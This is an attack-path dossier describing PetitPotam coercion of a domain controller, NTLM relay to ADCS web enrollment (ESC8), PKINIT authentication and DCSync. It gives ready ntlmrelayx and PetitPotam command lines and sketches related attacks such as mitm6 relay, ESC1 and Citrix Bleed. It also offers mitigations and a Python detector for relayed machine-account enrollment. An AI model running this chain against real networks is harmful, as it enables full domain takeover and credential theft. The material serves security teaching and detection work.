PetitPotam + ADCS ESC8 → Domain Controller takeover
Coerce a DC's machine account to authenticate to the attacker, relay that NTLM to the ADCS HTTP web-enrollment endpoint, and obtain a DC certificate for full domain compromise.
§ Context
Assumed environment: a Certificate Authority with HTTP/HTTPS web enrollment enabled (Certsrv) is reachable from the attacker, that endpoint accepts NTLM without enforcing Extended Protection for Authentication (channel binding), and EFSRPC (or another coercion RPC) is exposed on the DC. The attacker also needs a listener host that the DC can reach over SMB, because the coerced authentication is delivered there.
§ Steps
- 01 Low-priv domain user (Initial Access, T1078: Valid Accounts)
Any authenticated domain account. Patched DCs reject unauthenticated EFSRPC calls, so these credentials are what the coercion in step 03 runs with.
- 02 Start ntlmrelayx → CA web enrollment (Credential Access, T1557.001: LLMNR/NBT-NS Poisoning and SMB Relay)
ntlmrelayx.py -t http://<ca>/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
The listener must be up before the DC is coerced. The incoming SMB authentication is relayed to the web-enrollment endpoint; --template DomainController is chosen because the relayed identity is a DC machine account and that template builds the subject from the requester.
- 03 Coerce DC via PetitPotam (Credential Access, AD-COERCE: Authentication Coercion)
PetitPotam.py -u <user> -p <password> -d <domain> <listener_ip> <dc_ip>
The DC's machine account connects back to <listener_ip> over SMB to open the UNC path PetitPotam supplied, authenticating with NTLM.
- 04 DC cert issued via ESC8 (Credential Access, AD-ESC8: ADCS ESC8, HTTP Web Enrollment NTLM Relay)
The CA issues a certificate to the DC's machine account; ntlmrelayx prints it as a base64-encoded PFX.
- 05 PKINIT auth as DC$ (Lateral Movement, T1550.003: Pass the Ticket)
Authenticate with the certificate via PKINIT (Certipy's auth mode or PKINITtools) to obtain a TGT for the DC's machine account; UnPAC-the-hash then recovers that account's NT hash if a hash is more convenient than a ticket.
- 06 DCSync via DC machine account (Credential Access, T1003.006: DCSync)
Domain controllers hold directory replication rights, so the DC$ TGT or hash authorizes a secretsdump-style replication of every account's secrets, including krbtgt.
§ References
- T1078: Valid Accounts
- T1550.003: Pass the Ticket
- T1003.006: DCSync
- T1557.001: LLMNR/NBT-NS Poisoning and SMB Relay
§ Frequently asked
- What is the "PetitPotam + ADCS ESC8 → Domain Controller takeover" attack path?
- Coerce a DC's machine account to authenticate to the attacker, relay that NTLM to the ADCS HTTP web-enrollment endpoint, and obtain a DC certificate for full domain compromise. It chains six steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- Any low-privileged domain user (T1078), an initial-access primitive, in the assumed environment: a Certificate Authority with HTTP/HTTPS web enrollment enabled (Certsrv) reachable from the attacker, NTLM accepted on that endpoint without Extended Protection for Authentication, and EFSRPC (or another coercion RPC) exposed on the DC.
- What is the final impact of this kill-chain?
- Full domain compromise. The DC certificate issued via ESC8 (AD-ESC8) authenticates the attacker as the DC's machine account, and that account's replication rights allow DCSync (T1003.006) of every credential in the domain, including krbtgt. From here an operator typically pivots into post-exploitation or establishes persistence.
- How can defenders detect or prevent this attack?
- Prevent: remove web enrollment if nothing uses it; otherwise disable NTLM on the Certsrv site, or require HTTPS with Extended Protection for Authentication so that relayed NTLM fails channel binding. Cut the coercion side with RPC filters that block the EFSRPC interface on domain controllers. Detect: a machine account (a name ending in $) authenticating to the CA web server from an address that is not that machine's own, CA request and issuance events (4886/4887) in which a DC machine account obtains a DomainController-template certificate through web enrollment, and EFSRPC calls arriving at DCs from workstations. Each linked MITRE ATT&CK entry under "References" adds per-technique controls, telemetry, and known threat-actor usage.
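The detection answer above can be made concrete. The script below is an added example for this dossier, not code from the original page or from any of the tools it names. It assumes (all constructed for the example) that the CA's IIS site writes W3C logs with the default field set, that the defender keeps a map of machine-account names to their real addresses, and that issued-certificate records with requester, template and time (the shape of Security event 4887) are available for correlation. It flags any machine account reaching /certsrv/ (autoenrollment goes over RPC/DCOM, never the web pages), raises severity when the client address is not the machine's own, and escalates again when the CA issued that account a certificate within five minutes.

```python
"""Detection logic for ESC8-style NTLM relay against ADCS web enrollment.

Added example, not code from the dossier or from the tools it names.
Assumptions (constructed): IIS W3C logs with default fields on the CA web
server, a map of machine accounts to their real IPs, and issuance records
shaped like Security event 4887 (requester, template, time).
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

CORRELATION_WINDOW = timedelta(minutes=5)

# Constructed IIS log excerpt for the CA web server (s-ip 10.0.0.20). alice
# enrols normally from her workstation; the DC01$ POST from 10.0.0.50 is what a
# relayed coercion looks like. The User-Agent values are made up and are not
# a reliable indicator.
SAMPLE_IIS_LOG = r"""
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-05-02 09:14:03 10.0.0.20 GET /certsrv/certrqxt.asp - 80 CORP\alice 10.0.0.73 Mozilla/5.0 - 200 0 0 31
2024-05-02 09:14:21 10.0.0.20 POST /certsrv/certfnsh.asp - 80 CORP\alice 10.0.0.73 Mozilla/5.0 - 200 0 0 120
2024-05-02 09:20:45 10.0.0.20 GET /certsrv/certfnsh.asp - 80 - 10.0.0.50 Python-urllib/3.11 - 401 2 5 0
2024-05-02 09:20:46 10.0.0.20 POST /certsrv/certfnsh.asp - 80 CORP\DC01$ 10.0.0.50 Python-urllib/3.11 - 200 0 0 94
2024-05-02 09:31:10 10.0.0.20 GET /certsrv/ - 80 CORP\SRV02$ 10.0.0.31 Mozilla/5.0 - 200 0 0 12
"""

# Constructed: machine account -> its real address (from DNS or DHCP leases).
MACHINE_IPS = {"DC01$": "10.0.0.10", "SRV02$": "10.0.0.31"}

# Constructed issuance records modelled on the fields of Security event 4887.
ISSUED = [
    {"when": datetime(2024, 5, 2, 9, 14, 22), "requester": "CORP\\alice", "template": "User"},
    {"when": datetime(2024, 5, 2, 9, 20, 47), "requester": "CORP\\DC01$", "template": "DomainController"},
]


def parse_w3c(text):
    """Parse IIS W3C extended log text into dicts keyed by the #Fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif not line or line.startswith("#"):      # blank, #Software, #Date
            continue
        elif fields is None:
            raise ValueError("data line before #Fields header")
        else:
            values = line.split()
            if len(values) == len(fields):            # skip truncated lines
                rows.append(dict(zip(fields, values)))
    return rows


@dataclass
class Alert:
    when: datetime
    account: str        # sAMAccountName, e.g. DC01$
    client_ip: str
    severity: str       # medium | high | critical
    reason: str


def _sam(cs_username):
    """CORP\\DC01$ -> DC01$ (domain prefix stripped, case normalised)."""
    return cs_username.split("\\")[-1].upper()


def detect_relay(rows, machine_ips, issued):
    """Flag machine accounts using web enrollment; escalate when relayed."""
    alerts = []
    for r in rows:
        user = r.get("cs-username", "-")
        if not user.endswith("$") or not r["cs-uri-stem"].lower().startswith("/certsrv/"):
            continue                      # skips anonymous 401s and human users
        when = datetime.strptime(f"{r['date']} {r['time']}", "%Y-%m-%d %H:%M:%S")
        sam, src = _sam(user), r["c-ip"]
        expected = machine_ips.get(sam)
        if src == expected:
            severity = "medium"
            reason = f"{sam} used web enrollment from its own host; autoenrollment never does this"
        else:
            severity = "high"
            reason = (f"{sam} authenticated to {r['cs-uri-stem']} from {src}, registered "
                      f"address {expected or 'unknown'}: NTLM relay suspected")
        for iss in issued:    # correlate with what the CA actually issued
            if _sam(iss["requester"]) == sam and abs(iss["when"] - when) <= CORRELATION_WINDOW:
                severity = "critical" if severity == "high" else severity
                reason += f"; CA issued {iss['template']} template to {sam} at {iss['when']:%H:%M:%S}"
        alerts.append(Alert(when, sam, src, severity, reason))
    return alerts


def run_sample():
    """Run the detector over the constructed data above."""
    return detect_relay(parse_w3c(SAMPLE_IIS_LOG), MACHINE_IPS, ISSUED)


if __name__ == "__main__":
    for a in run_sample():
        print(f"[{a.severity}] {a.when:%Y-%m-%d %H:%M:%S} {a.account} from {a.client_ip}: {a.reason}")
```

On the constructed data the DC01$ request from 10.0.0.50 comes out as critical (wrong source address plus a DomainController certificate issued one second later), while SRV02$ browsing Certsrv from its own address is only medium. In production the address map should be refreshed from DNS or DHCP, and the 4886/4887 correlation is what separates a failed relay attempt from a successful ESC8.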
§ Related dossiers
- mitm6 IPv6 SLAAC → NTLM relay → DA (shared techniques: 4)
Even when IPv4 is hardened, Windows clients prefer IPv6 and request DHCPv6 configuration by default. mitm6 makes the attacker the IPv6 DNS server, advertises WPAD, and relays the captured NTLM to LDAPS for RBCD.
- Unconstrained delegation → Capture DC TGT → DCSync (shared techniques: 4)
Compromise a host with TRUSTED_FOR_DELEGATION, coerce a DC to authenticate to it, harvest the DC's TGT from its LSASS, then DCSync.
- ADCS ESC11 → certificate via RPC (no web enrollment) (shared techniques: 3)
When the CA's ICertPassage RPC interface accepts NTLM without requiring signing, relay any coerced auth directly to RPC and obtain a cert, bypassing HTTP-only mitigations.
- ADCS ESC1 → Domain Admin (shared techniques: 3)
A low-priv domain user discovers a certificate template that lets enrollees supply an arbitrary subjectAltName, enrolls a cert as Administrator, and authenticates via PKINIT.
- Citrix Bleed → steal authenticated session → MFA bypass (shared techniques: 2)
Send a long Host header to a vulnerable NetScaler; the memory disclosure leaks an authenticated session token already past MFA. Replay the token to log into the corporate VPN.
- 802.1X NAC bypass via printer MAC spoof (shared techniques: 2)
Plug into the LAN, sniff a printer or IP-phone MAC, clone it on your laptop, and get full LAN access via MAC Authentication Bypass, sidestepping NAC entirely.